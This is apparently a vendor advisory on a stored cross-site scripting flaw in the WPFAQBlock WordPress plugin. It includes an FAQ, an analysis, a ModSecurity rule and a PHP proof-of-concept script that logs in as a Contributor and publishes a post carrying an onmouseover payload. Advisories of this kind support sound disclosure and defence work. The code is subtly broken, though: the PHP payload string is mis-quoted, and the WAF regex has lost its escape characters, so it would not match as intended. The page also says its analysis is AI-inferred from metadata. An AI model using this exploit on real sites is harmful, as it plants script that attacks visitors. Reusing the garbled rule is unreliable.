What is CVE-2026-1093?

CVE-2026-1093 is a stored cross-site scripting (XSS) vulnerability in the WPFAQBlock plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via the ‘class’ parameter of the ‘wpfaqblock’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes. An attacker can craft a shortcode with a malicious ‘class’ attribute, which, when executed, runs the injected script in the context of any user viewing the affected page.

Who is affected by this vulnerability?

Authenticated users with Contributor-level access or higher are affected, as they can exploit this vulnerability. This means that any WordPress site using the vulnerable version of the WPFAQBlock plugin is at risk if it has such users.

How can I check if my site is vulnerable?

To check for vulnerability, verify if your site is using WPFAQBlock plugin version 1.1 or earlier. If so, review your user roles and ensure that no unauthorized users have Contributor-level access or higher.

What is the severity of this vulnerability?

CVE-2026-1093 has a CVSS score of 6.4, indicating medium severity. This reflects the requirement for authentication to exploit the vulnerability, yet it poses significant risks to all users accessing the compromised content.

What practical risks does this vulnerability pose?

The vulnerability can lead to client-side code execution in victims’ browsers, allowing attackers to steal session cookies, perform actions as the victim user, or deface the site. This can affect all users who view the compromised page.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the WPFAQBlock plugin to a version that addresses the issue. Additionally, ensure that user input is properly sanitized and that output escaping is applied to the ‘class’ attribute using functions like esc_attr().

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, restrict access to Contributor-level users and monitor user activity closely. Consider removing the ability to use the ‘wpfaqblock’ shortcode until a fix is applied.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can create a post with a malicious shortcode that includes a harmful ‘class’ attribute. It shows the steps necessary to exploit the vulnerability using valid Contributor credentials.

What is the role of input sanitization and output escaping?

Input sanitization and output escaping are critical security practices. Input sanitization ensures that user input is clean and safe, while output escaping ensures that any data rendered in HTML is treated as plain text, preventing script execution.

What is the CWE classification for this vulnerability?

CVE-2026-1093 is classified under CWE-79, which refers to improper neutralization of input during web page generation. This indicates a failure to adequately handle user input, leading to potential XSS vulnerabilities.

What are the long-term implications of this vulnerability?

The stored nature of this vulnerability means that once exploited, it can affect all visitors to the compromised page. This can lead to widespread security issues, including data breaches and loss of user trust.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-1093: WPFAQBlock– FAQ & Accordion Plugin For Gutenberg <= 1.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute (wpfaqblock)

CVE ID CVE-2026-1093

Plugin wpfaqblock

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.1

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1093 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WPFAQBlock plugin for WordPress. The issue exists within the plugin’s ‘wpfaqblock’ shortcode handler. Attackers with at least Contributor-level access can inject malicious scripts via the shortcode’s ‘class’ attribute. These scripts execute in the context of any user viewing a page or post containing the compromised shortcode. The CVSS score of 6.4 (Medium severity) reflects the need for authentication and the scope change impact on site visitors.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping. The vulnerability description directly states this. The CWE-79 classification confirms improper neutralization of input during web page generation. The plugin likely registers a shortcode using `add_shortcode(‘wpfaqblock’, …)`. Its callback function probably accepts user-supplied shortcode attributes, including ‘class’, and directly echoes them into the page HTML without proper escaping functions like `esc_attr()`. This inference is based on the standard WordPress shortcode API pattern and the described flaw.

Exploitation requires an authenticated user with the ‘edit_posts’ capability (Contributor or higher). The attacker creates or edits a post, inserting the vulnerable shortcode with a malicious ‘class’ attribute payload. For example: `[wpfaqblock class=”” onmouseover=alert(document.domain)]`. The payload could also use event handlers like `onload` in SVG contexts or script tags if the attribute value is placed within an unquoted HTML context. The malicious post is saved. The script executes for any user (including administrators) who views that post, enabling session hijacking, defacement, or admin action simulation.

Remediation requires implementing proper output escaping. The patched version must escape the ‘class’ attribute value before output. In WordPress, the correct function is `esc_attr()` when outputting an attribute value within an HTML tag. The plugin should also consider validating the ‘class’ attribute value against a safe pattern (e.g., alphanumeric characters and hyphens) using `sanitize_html_class()`. Input sanitization on shortcode attribute receipt is less critical than output escaping, as WordPress shortcode attributes are inherently user input.

The impact is client-side code execution in the victim’s browser. Successful exploitation allows an attacker to steal session cookies, perform actions as the victim user (like creating administrator accounts if an admin views the page), redirect users, or deface the site. The stored nature means the attack persists and scales, affecting all visitors to the compromised page. The scope change (S:C in CVSS) indicates the vulnerability can affect users beyond the plugin’s own security scope, impacting the entire WordPress site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1093 (metadata-based)
# This rule targets the insertion of malicious 'class' attributes in the 'wpfaqblock' shortcode.
# It assumes the primary attack vector is through post content submission (REST API or admin POST).
# The rule inspects the 'content' parameter for the shortcode pattern with a malicious 'class' attribute.
# It uses regex to detect common XSS payloads within the class attribute value.
SecRule REQUEST_METHOD "@rx ^(POST|PUT)$" 
  "id:1001093,phase:2,deny,status:403,chain,msg:'CVE-2026-1093: WPFAQBlock Stored XSS via shortcode class attribute',severity:'CRITICAL',tag:'CVE-2026-1093',tag:'WordPress',tag:'WPFAQBlock',tag:'XSS'"
  SecRule REQUEST_URI "@rx (?:/wp-json/wp/v2/(?:posts|pages)|/wp-admin/post.php|/wp-admin/admin-ajax.php)" 
    "chain"
    SecRule ARGS_POST:content|ARGS:content "@rx [wpfaqblock[^]]*classs*=s*['"]?[^'"]*?(["']?s*onw+s*=|javascript:|<script|x00|x22|x27|x3C|x3E|xE2x80xA8|xE2x80xA9)[^]]*]" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,setvar:'tx.cve_2026_1093_score=+1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1093 - WPFAQBlock– FAQ & Accordion Plugin For Gutenberg <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute

<?php
/**
 * Proof of Concept for CVE-2026-1093.
 * Assumptions:
 * 1. The target site has the WPFAQBlock plugin (v1.1 or earlier) installed.
 * 2. We have valid Contributor-level credentials (or higher).
 * 3. The plugin's shortcode 'wpfaqblock' is functional.
 * 4. The standard WordPress REST API is available for authentication and post creation.
 * This script simulates an attacker creating a post with a malicious shortcode.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$username = 'contributor_user';      // CHANGE THIS
$password = 'contributor_pass';      // CHANGE THIS

// Payload: XSS via the 'class' shortcode attribute.
// Using a simple alert for demonstration. Real attacks would use more complex JavaScript.
$malicious_shortcode = "[wpfaqblock class='" onmouseover=alert(1) x="']";
$post_title = "Test Post with XSS";
$post_content = "This post contains the malicious shortcode. {$malicious_shortcode}";

// Step 1: Authenticate via WordPress REST API to obtain a nonce or JWT.
// WordPress uses cookie-based authentication for REST API by default.
// We'll use a session with cURL to handle cookies.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
    CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false, // For testing only
]);

// Step 2: Get the REST API nonce (wp_rest) for authentication.
// First, fetch the login page to get necessary nonces (if needed) or use application passwords.
// For simplicity, this PoC assumes use of the 'wp-json/wp/v2' endpoint with cookie auth after a standard login.
// We'll perform a standard wp-login.php POST to establish session cookies.
$login_url = $target_url . '/wp-login.php';
$login_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_fields);
$response = curl_exec($ch);

// Step 3: Create a new post via REST API using the authenticated session.
$rest_url = $target_url . '/wp-json/wp/v2/posts';
$post_data = json_encode([
    'title' => $post_title,
    'content' => $post_content,
    'status' => 'publish' // Contributor can publish? Usually 'draft'. Use 'draft' if 'publish' fails.
]);
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Accept: application/json'
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Output result.
if ($http_code >= 200 && $http_code < 300) {
    $resp_data = json_decode($response, true);
    echo "[+] Post created successfully. Post ID: " . $resp_data['id'] . "n";
    echo "[+] View the post at: " . $resp_data['link'] . "n";
    echo "[+] The shortcode payload: {$malicious_shortcode}n";
    echo "[!] When a user views this post and interacts with the FAQ element, the XSS will trigger.n";
} else {
    echo "[-] Post creation failed. HTTP Code: {$http_code}n";
    echo "[-] Response: {$response}n";
    echo "[?] Try setting post status to 'draft' if Contributor role cannot publish.n";
}
?>

Frequently Asked Questions

What is CVE-2026-1093?
Overview of the vulnerability
CVE-2026-1093 is a stored cross-site scripting (XSS) vulnerability in the WPFAQBlock plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via the ‘class’ parameter of the ‘wpfaqblock’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes. An attacker can craft a shortcode with a malicious ‘class’ attribute, which, when executed, runs the injected script in the context of any user viewing the affected page.
Who is affected by this vulnerability?
User roles and access levels
Authenticated users with Contributor-level access or higher are affected, as they can exploit this vulnerability. This means that any WordPress site using the vulnerable version of the WPFAQBlock plugin is at risk if it has such users.
How can I check if my site is vulnerable?
Identifying vulnerable installations
To check for vulnerability, verify if your site is using WPFAQBlock plugin version 1.1 or earlier. If so, review your user roles and ensure that no unauthorized users have Contributor-level access or higher.
What is the severity of this vulnerability?
Understanding the CVSS score
CVE-2026-1093 has a CVSS score of 6.4, indicating medium severity. This reflects the requirement for authentication to exploit the vulnerability, yet it poses significant risks to all users accessing the compromised content.
What practical risks does this vulnerability pose?
Potential impacts on users
The vulnerability can lead to client-side code execution in victims’ browsers, allowing attackers to steal session cookies, perform actions as the victim user, or deface the site. This can affect all users who view the compromised page.
How can I mitigate this vulnerability?
Steps for remediation
To mitigate this vulnerability, update the WPFAQBlock plugin to a version that addresses the issue. Additionally, ensure that user input is properly sanitized and that output escaping is applied to the ‘class’ attribute using functions like esc_attr().
What should I do if I cannot update the plugin immediately?
Temporary measures
If an immediate update is not possible, restrict access to Contributor-level users and monitor user activity closely. Consider removing the ability to use the ‘wpfaqblock’ shortcode until a fix is applied.
How does the proof of concept demonstrate the issue?
Understanding the example provided
The proof of concept illustrates how an attacker can create a post with a malicious shortcode that includes a harmful ‘class’ attribute. It shows the steps necessary to exploit the vulnerability using valid Contributor credentials.
What is the role of input sanitization and output escaping?
Technical details on security practices
Input sanitization and output escaping are critical security practices. Input sanitization ensures that user input is clean and safe, while output escaping ensures that any data rendered in HTML is treated as plain text, preventing script execution.
What is the CWE classification for this vulnerability?
Understanding the coding weakness
CVE-2026-1093 is classified under CWE-79, which refers to improper neutralization of input during web page generation. This indicates a failure to adequately handle user input, leading to potential XSS vulnerabilities.
What are the long-term implications of this vulnerability?
Impact on site security
The stored nature of this vulnerability means that once exploited, it can affect all visitors to the compromised page. This can lead to widespread security issues, including data breaches and loss of user trust.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations